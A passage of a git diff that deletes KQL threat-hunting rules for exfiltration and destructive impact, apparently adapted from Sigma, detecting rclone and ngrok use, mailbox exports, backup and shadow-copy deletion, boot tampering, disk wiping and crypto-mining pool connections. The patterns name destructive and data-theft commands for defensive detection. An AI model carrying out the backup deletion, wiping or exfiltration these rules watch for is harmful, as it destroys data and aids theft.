-| where (ProcessCommandLine contains "--config " and ProcessCommandLine contains "--no-check-certificate " and ProcessCommandLine contains " copy ") or ((ProcessCommandLine contains "pass" or ProcessCommandLine contains "user" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "sync" or ProcessCommandLine contains "config" or ProcessCommandLine contains "lsd" or ProcessCommandLine contains "remote" or ProcessCommandLine contains "ls" or ProcessCommandLine contains "mega" or ProcessCommandLine contains "pcloud" or ProcessCommandLine contains "ftp" or ProcessCommandLine contains "ignore-existing" or ProcessCommandLine contains "auto-confirm" or ProcessCommandLine contains "transfers" or ProcessCommandLine contains "multi-thread-streams" or ProcessCommandLine contains "no-check-certificate ") and (FolderPath endswith "\\rclone.exe" or ProcessVersionInfoFileDescription =~ "Rsync for cloud storage"))
\ No newline at end of file
diff --git a/Exfiltration/Process_Initiated_Network__Connection_To_Ngrok_Domain.kql b/Exfiltration/Process_Initiated_Network__Connection_To_Ngrok_Domain.kql
deleted file mode 100644
index 68832173..00000000
--- a/Exfiltration/Process_Initiated_Network__Connection_To_Ngrok_Domain.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/07/16
-// Level: high
-// Description: Detects an executable initiating a network connection to "ngrok" domains.
-Attackers were seen using this "ngrok" in order to store their second stage payloads and malware.
-While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
-
-// Tags: attack.exfiltration, attack.t1567.001
-DeviceNetworkEvents
-| where RemoteUrl endswith ".ngrok-free.app" or RemoteUrl endswith ".ngrok-free.dev" or RemoteUrl endswith ".ngrok.app" or RemoteUrl endswith ".ngrok.dev" or RemoteUrl endswith ".ngrok.io"
\ No newline at end of file
diff --git a/Exfiltration/Rclone_Config_File_Creation.kql b/Exfiltration/Rclone_Config_File_Creation.kql
deleted file mode 100644
index 670716d1..00000000
--- a/Exfiltration/Rclone_Config_File_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Aaron Greetham (@beardofbinary) - NCC Group
-// Date: 2021/05/26
-// Level: medium
-// Description: Detects Rclone config files being created
-// Tags: attack.exfiltration, attack.t1567.002
-DeviceFileEvents
-| where FolderPath contains ":\\Users\\" and FolderPath contains "\\.config\\rclone\\"
\ No newline at end of file
diff --git a/Exfiltration/Suspicious_PowerShell_Mailbox_Export_to_Share.kql b/Exfiltration/Suspicious_PowerShell_Mailbox_Export_to_Share.kql
deleted file mode 100644
index b9fb4ee4..00000000
--- a/Exfiltration/Suspicious_PowerShell_Mailbox_Export_to_Share.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/08/07
-// Level: critical
-// Description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
-// Tags: attack.exfiltration
-DeviceProcessEvents
-| where ProcessCommandLine contains "New-MailboxExportRequest" and ProcessCommandLine contains " -Mailbox " and ProcessCommandLine contains " -FilePath \\\\"
\ No newline at end of file
diff --git a/Exfiltration/Suspicious_Redirection_to_Local_Admin_Share.kql b/Exfiltration/Suspicious_Redirection_to_Local_Admin_Share.kql
deleted file mode 100644
index 6be1dff3..00000000
--- a/Exfiltration/Suspicious_Redirection_to_Local_Admin_Share.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/16
-// Level: high
-// Description: Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers
-// Tags: attack.exfiltration, attack.t1048
-DeviceProcessEvents
-| where ProcessCommandLine contains ">" and (ProcessCommandLine contains "\\\\127.0.0.1\\admin$\\" or ProcessCommandLine contains "\\\\localhost\\admin$\\")
\ No newline at end of file
diff --git a/Exfiltration/Suspicious_WebDav_Client_Execution_Via_Rundll32.EXE.kql b/Exfiltration/Suspicious_WebDav_Client_Execution_Via_Rundll32.EXE.kql
deleted file mode 100644
index 4e2e05ff..00000000
--- a/Exfiltration/Suspicious_WebDav_Client_Execution_Via_Rundll32.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2023/03/16
-// Level: high
-// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397
-
-// Tags: attack.exfiltration, attack.t1048.003, cve.2023.23397
-DeviceProcessEvents
-| where (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessCommandLine contains "-s WebClient" and InitiatingProcessFolderPath endswith "\\svchost.exe") and (not((ProcessCommandLine contains "://10." or ProcessCommandLine contains "://192.168." or ProcessCommandLine contains "://172.16." or ProcessCommandLine contains "://172.17." or ProcessCommandLine contains "://172.18." or ProcessCommandLine contains "://172.19." or ProcessCommandLine contains "://172.20." or ProcessCommandLine contains "://172.21." or ProcessCommandLine contains "://172.22." or ProcessCommandLine contains "://172.23." or ProcessCommandLine contains "://172.24." or ProcessCommandLine contains "://172.25." or ProcessCommandLine contains "://172.26." or ProcessCommandLine contains "://172.27." or ProcessCommandLine contains "://172.28." or ProcessCommandLine contains "://172.29." or ProcessCommandLine contains "://172.30." or ProcessCommandLine contains "://172.31." or ProcessCommandLine contains "://127." or ProcessCommandLine contains "://169.254.")))
\ No newline at end of file
diff --git a/Exfiltration/Tap_Installer_Execution.kql b/Exfiltration/Tap_Installer_Execution.kql
deleted file mode 100644
index 011f6fd3..00000000
--- a/Exfiltration/Tap_Installer_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Daniil Yugoslavskiy, Ian Davis, oscd.community
-// Date: 2019/10/24
-// Level: medium
-// Description: Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques
-// Tags: attack.exfiltration, attack.t1048
-DeviceProcessEvents
-| where FolderPath endswith "\\tapinstall.exe" and (not(((FolderPath contains ":\\Program Files\\Avast Software\\SecureLine VPN\\" or FolderPath contains ":\\Program Files (x86)\\Avast Software\\SecureLine VPN\\") or FolderPath contains ":\\Program Files\\OpenVPN Connect\\drivers\\tap\\" or FolderPath contains ":\\Program Files (x86)\\Proton Technologies\\ProtonVPNTap\\installer\\")))
\ No newline at end of file
diff --git a/Exfiltration/WebDav_Client_Execution_Via_Rundll32.EXE.kql b/Exfiltration/WebDav_Client_Execution_Via_Rundll32.EXE.kql
deleted file mode 100644
index d71f9266..00000000
--- a/Exfiltration/WebDav_Client_Execution_Via_Rundll32.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie".
-This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).
-
-// Tags: attack.exfiltration, attack.t1048.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/Impact/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql b/Impact/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql
deleted file mode 100644
index 5a91ee73..00000000
--- a/Impact/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/23
-// Level: high
-// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
-// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential_access, attack.impact
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-AADInt" or ProcessCommandLine contains "ConvertTo-AADInt" or ProcessCommandLine contains "Disable-AADInt" or ProcessCommandLine contains "Enable-AADInt" or ProcessCommandLine contains "Export-AADInt" or ProcessCommandLine contains "Get-AADInt" or ProcessCommandLine contains "Grant-AADInt" or ProcessCommandLine contains "Install-AADInt" or ProcessCommandLine contains "Invoke-AADInt" or ProcessCommandLine contains "Join-AADInt" or ProcessCommandLine contains "New-AADInt" or ProcessCommandLine contains "Open-AADInt" or ProcessCommandLine contains "Read-AADInt" or ProcessCommandLine contains "Register-AADInt" or ProcessCommandLine contains "Remove-AADInt" or ProcessCommandLine contains "Restore-AADInt" or ProcessCommandLine contains "Search-AADInt" or ProcessCommandLine contains "Send-AADInt" or ProcessCommandLine contains "Set-AADInt" or ProcessCommandLine contains "Start-AADInt" or ProcessCommandLine contains "Update-AADInt") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))
\ No newline at end of file
diff --git a/Impact/All_Backups_Deleted_Via_Wbadmin.EXE.kql b/Impact/All_Backups_Deleted_Via_Wbadmin.EXE.kql
deleted file mode 100644
index 3de1df11..00000000
--- a/Impact/All_Backups_Deleted_Via_Wbadmin.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/13
-// Level: high
-// Description: Detects the deletion of all backups or system state backups via "wbadmin.exe".
-This technique is used by numerous ransomware families and actors.
-This may only be successful on server platforms that have Windows Backup enabled.
-
-// Tags: attack.impact, attack.t1490
-DeviceProcessEvents
-| where (ProcessCommandLine contains "keepVersions:0" and (ProcessCommandLine contains "delete" and ProcessCommandLine contains "backup")) and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")
\ No newline at end of file
diff --git a/Impact/Backup_Files_Deleted.kql b/Impact/Backup_Files_Deleted.kql
deleted file mode 100644
index 742c161c..00000000
--- a/Impact/Backup_Files_Deleted.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/02
-// Level: medium
-// Description: Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.
-// Tags: attack.impact, attack.t1490
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wt.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe") and (FolderPath endswith ".VHD" or FolderPath endswith ".bac" or FolderPath endswith ".bak" or FolderPath endswith ".wbcat" or FolderPath endswith ".bkf" or FolderPath endswith ".set" or FolderPath endswith ".win" or FolderPath endswith ".dsk")
\ No newline at end of file
diff --git a/Impact/Boot_Configuration_Tampering_Via_Bcdedit.EXE.kql b/Impact/Boot_Configuration_Tampering_Via_Bcdedit.EXE.kql
deleted file mode 100644
index e80b818d..00000000
--- a/Impact/Boot_Configuration_Tampering_Via_Bcdedit.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019/10/24
-// Level: high
-// Description: Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.
-// Tags: attack.impact, attack.t1490
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "bootstatuspolicy" and ProcessCommandLine contains "ignoreallfailures") or (ProcessCommandLine contains "recoveryenabled" and ProcessCommandLine contains "no")) and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe") and ProcessCommandLine contains "set"
\ No newline at end of file
diff --git a/Impact/Copy_From_VolumeShadowCopy_Via_Cmd.EXE.kql b/Impact/Copy_From_VolumeShadowCopy_Via_Cmd.EXE.kql
deleted file mode 100644
index 0697d1a3..00000000
--- a/Impact/Copy_From_VolumeShadowCopy_Via_Cmd.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
-// Date: 2021/08/09
-// Level: high
-// Description: Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use)
-// Tags: attack.impact, attack.t1490
-DeviceProcessEvents
-| where ProcessCommandLine contains "copy " and ProcessCommandLine contains "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy"
\ No newline at end of file
diff --git a/Impact/Delete_All_Scheduled_Tasks.kql b/Impact/Delete_All_Scheduled_Tasks.kql
deleted file mode 100644
index 4b16c868..00000000
--- a/Impact/Delete_All_Scheduled_Tasks.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: high
-// Description: Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.
-// Tags: attack.impact, attack.t1489
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /delete " and ProcessCommandLine contains "/tn *" and ProcessCommandLine contains " /f") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/Impact/Delete_Important_Scheduled_Task.kql b/Impact/Delete_Important_Scheduled_Task.kql
deleted file mode 100644
index a382f4fb..00000000
--- a/Impact/Delete_Important_Scheduled_Task.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: high
-// Description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities
-// Tags: attack.impact, attack.t1489
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\Windows\\BitLocker" or ProcessCommandLine contains "\\Windows\\ExploitGuard" or ProcessCommandLine contains "\\Windows\\SystemRestore\\SR" or ProcessCommandLine contains "\\Windows\\UpdateOrchestrator\\" or ProcessCommandLine contains "\\Windows\\Windows Defender\\" or ProcessCommandLine contains "\\Windows\\WindowsBackup\\" or ProcessCommandLine contains "\\Windows\\WindowsUpdate\\") and (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "/tn") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/Impact/Deleted_Data_Overwritten_Via_Cipher.EXE.kql b/Impact/Deleted_Data_Overwritten_Via_Cipher.EXE.kql
deleted file mode 100644
index 24179601..00000000
--- a/Impact/Deleted_Data_Overwritten_Via_Cipher.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2021/12/26
-// Level: medium
-// Description: Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk.
-Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.
-Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives
-
-// Tags: attack.impact, attack.t1485
-DeviceProcessEvents
-| where ProcessCommandLine contains " /w:" and (ProcessVersionInfoOriginalFileName =~ "CIPHER.EXE" or FolderPath endswith "\\cipher.exe")
\ No newline at end of file
diff --git a/Impact/Deletion_of_Volume_Shadow_Copies_via_WMI_with_PowerShell.kql b/Impact/Deletion_of_Volume_Shadow_Copies_via_WMI_with_PowerShell.kql
deleted file mode 100644
index 508f1f42..00000000
--- a/Impact/Deletion_of_Volume_Shadow_Copies_via_WMI_with_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/20
-// Level: high
-// Description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
-// Tags: attack.impact, attack.t1490
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".Delete()" or ProcessCommandLine contains "Remove-WmiObject" or ProcessCommandLine contains "rwmi" or ProcessCommandLine contains "Remove-CimInstance" or ProcessCommandLine contains "rcim") and (ProcessCommandLine contains "Get-WmiObject" or ProcessCommandLine contains "gwmi" or ProcessCommandLine contains "Get-CimInstance" or ProcessCommandLine contains "gcim") and ProcessCommandLine contains "Win32_ShadowCopy"
\ No newline at end of file
diff --git a/Impact/Disable_Important_Scheduled_Task.kql b/Impact/Disable_Important_Scheduled_Task.kql
deleted file mode 100644
index b31674ee..00000000
--- a/Impact/Disable_Important_Scheduled_Task.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/26
-// Level: high
-// Description: Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities
-// Tags: attack.impact, attack.t1489
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\Windows\\BitLocker" or ProcessCommandLine contains "\\Windows\\ExploitGuard" or ProcessCommandLine contains "\\Windows\\SystemRestore\\SR" or ProcessCommandLine contains "\\Windows\\UpdateOrchestrator\\" or ProcessCommandLine contains "\\Windows\\Windows Defender\\" or ProcessCommandLine contains "\\Windows\\WindowsBackup\\" or ProcessCommandLine contains "\\Windows\\WindowsUpdate\\") and (ProcessCommandLine contains "/Change" and ProcessCommandLine contains "/TN" and ProcessCommandLine contains "/disable") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/Impact/File_Recovery_From_Backup_Via_Wbadmin.EXE.kql b/Impact/File_Recovery_From_Backup_Via_Wbadmin.EXE.kql
deleted file mode 100644
index 230b30d6..00000000
--- a/Impact/File_Recovery_From_Backup_Via_Wbadmin.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2024/05/10
-// Level: medium
-// Description: Detects the recovery of files from backups via "wbadmin.exe".
-Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.
-
-// Tags: attack.impact, attack.t1490
-DeviceProcessEvents
-| where (ProcessCommandLine contains " recovery" and ProcessCommandLine contains "recoveryTarget" and ProcessCommandLine contains "itemtype:File") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")
\ No newline at end of file
diff --git a/Impact/Fsutil_Suspicious_Invocation.kql b/Impact/Fsutil_Suspicious_Invocation.kql
deleted file mode 100644
index a4ffc9ee..00000000
--- a/Impact/Fsutil_Suspicious_Invocation.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Ecco, E.M. Anhaus, oscd.community
-// Date: 2019/09/26
-// Level: high
-// Description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).
-Might be used by ransomwares during the attack (seen by NotPetya and others).
-
-// Tags: attack.defense_evasion, attack.impact, attack.t1070, attack.t1485
-DeviceProcessEvents
-| where (ProcessCommandLine contains "deletejournal" or ProcessCommandLine contains "createjournal" or ProcessCommandLine contains "setZeroData") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe")
\ No newline at end of file
diff --git a/Impact/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql b/Impact/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql
deleted file mode 100644
index 815998df..00000000
--- a/Impact/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Luc Génaux
-// Date: 2023/11/28
-// Level: high
-// Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.
-This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
-It could also be used for anti-analysis purposes by shut downing specific processes.
-
-// Tags: attack.impact, attack.defense_evasion, attack.t1486, attack.t1562.001
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\")))
\ No newline at end of file
diff --git a/Impact/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql b/Impact/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql
deleted file mode 100644
index c3b92be9..00000000
--- a/Impact/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Luc Génaux
-// Date: 2023/11/28
-// Level: low
-// Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process.
-This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
-It could also be used for anti-analysis purposes by shut downing specific processes.
-
-// Tags: attack.impact, attack.defense_evasion, attack.t1486, attack.t1562.001
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and (not((InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains ":\\$WINDOWS.~BT\\" or InitiatingProcessFolderPath contains ":\\$WinREAgent\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\ProgramData\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\SoftwareDistribution\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysNative\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\" or InitiatingProcessFolderPath contains ":\\WUDownloadCache\\") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\is-" and InitiatingProcessFolderPath contains ".tmp\\") and InitiatingProcessFolderPath endswith ".tmp"))))
\ No newline at end of file
diff --git a/Impact/Network_Communication_With_Crypto_Mining_Pool.kql b/Impact/Network_Communication_With_Crypto_Mining_Pool.kql
deleted file mode 100644
index 1428996b..00000000
--- a/Impact/Network_Communication_With_Crypto_Mining_Pool.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/10/26
-// Level: high
-// Description: Detects initiated network connections to crypto mining pools
-// Tags: attack.impact, attack.t1496
-DeviceNetworkEvents
-| where RemoteUrl in~ ("alimabi.cn", "ap.luckpool.net", "bcn.pool.minergate.com", "bcn.vip.pool.minergate.com", "bohemianpool.com", "ca-aipg.miningocean.org", "ca-dynex.miningocean.org", "ca-neurai.miningocean.org", "ca-qrl.miningocean.org", "ca-upx.miningocean.org", "ca-zephyr.miningocean.org", "ca.minexmr.com", "ca.monero.herominers.com", "cbd.monerpool.org", "cbdv2.monerpool.org", "cryptmonero.com", "crypto-pool.fr", "crypto-pool.info", "cryptonight-hub.miningpoolhub.com", "d1pool.ddns.net", "d5pool.us", "daili01.monerpool.org", "de-aipg.miningocean.org", "de-dynex.miningocean.org", "de-zephyr.miningocean.org", "de.minexmr.com", "dl.nbminer.com", "donate.graef.in", "donate.ssl.xmrig.com", "donate.v2.xmrig.com", "donate.xmrig.com", "donate2.graef.in", "drill.moneroworld.com", "dwarfpool.com", "emercoin.com", "emercoin.net", "emergate.net", "ethereumpool.co", "eu.luckpool.net", "eu.minerpool.pw", "fcn-xmr.pool.minergate.com", "fee.xmrig.com", "fr-aipg.miningocean.org", "fr-dynex.miningocean.org", "fr-neurai.miningocean.org", "fr-qrl.miningocean.org", "fr-upx.miningocean.org", "fr-zephyr.miningocean.org", "fr.minexmr.com", "hellominer.com", "herominers.com", "hk-aipg.miningocean.org", "hk-dynex.miningocean.org", "hk-neurai.miningocean.org", "hk-qrl.miningocean.org", "hk-upx.miningocean.org", "hk-zephyr.miningocean.org", "huadong1-aeon.ppxxmr.com", "iwanttoearn.money", "jw-js1.ppxxmr.com", "koto-pool.work", "lhr.nbminer.com", "lhr3.nbminer.com", "linux.monerpool.org", "lokiturtle.herominers.com", "luckpool.net", "masari.miner.rocks", "mine.c3pool.com", "mine.moneropool.com", "mine.ppxxmr.com", "mine.zpool.ca", "mine1.ppxxmr.com", "minemonero.gq", "miner.ppxxmr.com", "miner.rocks", "minercircle.com", "minergate.com", "minerpool.pw", "minerrocks.com", "miners.pro", "minerxmr.ru", "minexmr.cn", "minexmr.com", "mining-help.ru", "miningpoolhub.com", "mixpools.org", "moner.monerpool.org", "moner1min.monerpool.org", "monero-master.crypto-pool.fr", "monero.crypto-pool.fr", "monero.hashvault.pro", "monero.herominers.com", "monero.lindon-pool.win", "monero.miners.pro", "monero.riefly.id", "monero.us.to", "monerocean.stream", "monerogb.com", "monerohash.com", "moneroocean.stream", "moneropool.com", "moneropool.nl", "monerorx.com", "monerpool.org", "moriaxmr.com", "mro.pool.minergate.com", "multipool.us", "myxmr.pw", "na.luckpool.net", "nanopool.org", "nbminer.com", "node3.luckpool.net", "noobxmr.com", "pangolinminer.comgandalph3000.com", "pool.4i7i.com", "pool.armornetwork.org", "pool.cortins.tk", "pool.gntl.co.uk", "pool.hashvault.pro", "pool.minergate.com", "pool.minexmr.com", "pool.monero.hashvault.pro", "pool.ppxxmr.com", "pool.somec.cc", "pool.support", "pool.supportxmr.com", "pool.usa-138.com", "pool.xmr.pt", "pool.xmrfast.com", "pool2.armornetwork.org", "poolchange.ppxxmr.com", "pooldd.com", "poolmining.org", "poolto.be", "ppxvip1.ppxxmr.com", "ppxxmr.com", "prohash.net", "r.twotouchauthentication.online", "randomx.xmrig.com", "ratchetmining.com", "seed.emercoin.com", "seed.emercoin.net", "seed.emergate.net", "seed1.joulecoin.org", "seed2.joulecoin.org", "seed3.joulecoin.org", "seed4.joulecoin.org", "seed5.joulecoin.org", "seed6.joulecoin.org", "seed7.joulecoin.org", "seed8.joulecoin.org", "sg-aipg.miningocean.org", "sg-dynex.miningocean.org", "sg-neurai.miningocean.org", "sg-qrl.miningocean.org", "sg-upx.miningocean.org", "sg-zephyr.miningocean.org", "sg.minexmr.com", "sheepman.mine.bz", "siamining.com", "sumokoin.minerrocks.com", "supportxmr.com", "suprnova.cc", "teracycle.net", "trtl.cnpool.cc", "trtl.pool.mine2gether.com", "turtle.miner.rocks", "us-aipg.miningocean.org", "us-dynex.miningocean.org", "us-neurai.miningocean.org", "us-west.minexmr.com", "us-zephyr.miningocean.org", "usxmrpool.com", "viaxmr.com", "webservicepag.webhop.net", "xiazai.monerpool.org", "xiazai1.monerpool.org", "xmc.pool.minergate.com", "xmo.pool.minergate.com", "xmr-asia1.nanopool.org", "xmr-au1.nanopool.org", "xmr-eu1.nanopool.org", "xmr-eu2.nanopool.org", "xmr-jp1.nanopool.org", "xmr-us-east1.nanopool.org", "xmr-us-west1.nanopool.org", "xmr-us.suprnova.cc", "xmr-usa.dwarfpool.com", "xmr.2miners.com", "xmr.5b6b7b.ru", "xmr.alimabi.cn", "xmr.bohemianpool.com", "xmr.crypto-pool.fr", "xmr.crypto-pool.info", "xmr.f2pool.com", "xmr.hashcity.org", "xmr.hex7e4.ru", "xmr.ip28.net", "xmr.monerpool.org", "xmr.mypool.online", "xmr.nanopool.org", "xmr.pool.gntl.co.uk", "xmr.pool.minergate.com", "xmr.poolto.be", "xmr.ppxxmr.com", "xmr.prohash.net", "xmr.simka.pw", "xmr.somec.cc", "xmr.suprnova.cc", "xmr.usa-138.com", "xmr.vip.pool.minergate.com", "xmr1min.monerpool.org", "xmrf.520fjh.org", "xmrf.fjhan.club", "xmrfast.com", "xmrigcc.graef.in", "xmrminer.cc", "xmrpool.de", "xmrpool.eu", "xmrpool.me", "xmrpool.net", "xmrpool.xyz", "xx11m.monerpool.org", "xx11mv2.monerpool.org", "xxx.hex7e4.ru", "zarabotaibitok.ru", "zer0day.ru")
\ No newline at end of file
diff --git a/Impact/New_Root_or_CA_or_AuthRoot_Certificate_to_Store.kql b/Impact/New_Root_or_CA_or_AuthRoot_Certificate_to_Store.kql
deleted file mode 100644
index ef325b09..00000000
--- a/Impact/New_Root_or_CA_or_AuthRoot_Certificate_to_Store.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/04
-// Level: medium
-// Description: Detects the addition of new root, CA or AuthRoot certificates to the Windows registry
-// Tags: attack.impact, attack.t1490
-DeviceRegistryEvents
